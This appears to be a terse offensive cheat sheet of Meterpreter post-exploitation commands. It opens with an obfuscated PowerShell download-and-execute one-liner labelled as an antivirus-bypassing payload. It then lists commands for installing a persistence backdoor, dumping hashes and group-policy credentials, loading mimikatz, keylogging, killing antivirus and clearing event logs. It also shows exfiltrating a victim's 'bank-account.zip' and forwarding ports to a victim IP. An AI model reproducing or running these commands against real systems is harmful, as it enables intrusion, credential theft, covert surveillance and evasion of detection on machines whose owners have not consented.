# meterpreter METERPRETER Turning Meterpreter into PowerShell post/windows/manage/payload\_inject windows exec payload example with AV bypassing payload powershell.exe "(New-Object Net.WebClient).(((((New-Object Net.WebClient)).PsObject.Methods)|Where-Object{$\_.Name-ilike'*nl*g'}).Name).Invoke('') | IEX" \*\*To keep shell from dying -- set all multi handler options, before actually running the multi-handler, type the following for persistence exec cmd.exe -f -h set autorunscript explorer.exe set autorunscript migrate -f run post/windows/manage/migrate run persistence <--for a back door run post/windows/gather/credentials/gpp <--get group policy creds run getgui <--enable rdp clearev <--clear event log run post/windows/capture/keylog\_recorder <--record keystrokes run killav <-- kill anti virus run vnc <-- get a gui :) run hashdump <--dump system hashes run post/windows/gather/dumplinks <---gather link files that may be useful run post/windows/gather/enum\_applications <--enumerate applications load mimikatz <----- load mimikatz function (IE password dumps etc) getsystem <------escalate privs run post/windows/gather/credentials/mssql\_local\_hashdump <--dump database run winenum <----enumerate system in meterpreter (files get stored in .msf4 or .msf8) run post/windows/gather/win\_privs <---check if you are an admin run post/multi/recon/local\_exploit\_suggester <----check for privilege escalation run post/windows/gather/credentials/credential\_collector run post/windows/gather/enum\_ms\_product\_keys execute -f cmd.exe -i -H <-----run commands in meterpreter meterpreter > download C:\bank-account.zip /root/Desktop/bank-account.zip \[*] downloading: C:\bank-account.zip -> /root/Desktop/bank-account.zip \[*] download : C:\bank-account.zip -> /root/Desktop/bank-account.zip portfwd add -l 1234 -p 445 -r 10.11.1.14 my port | their port - the ip address is the victim IP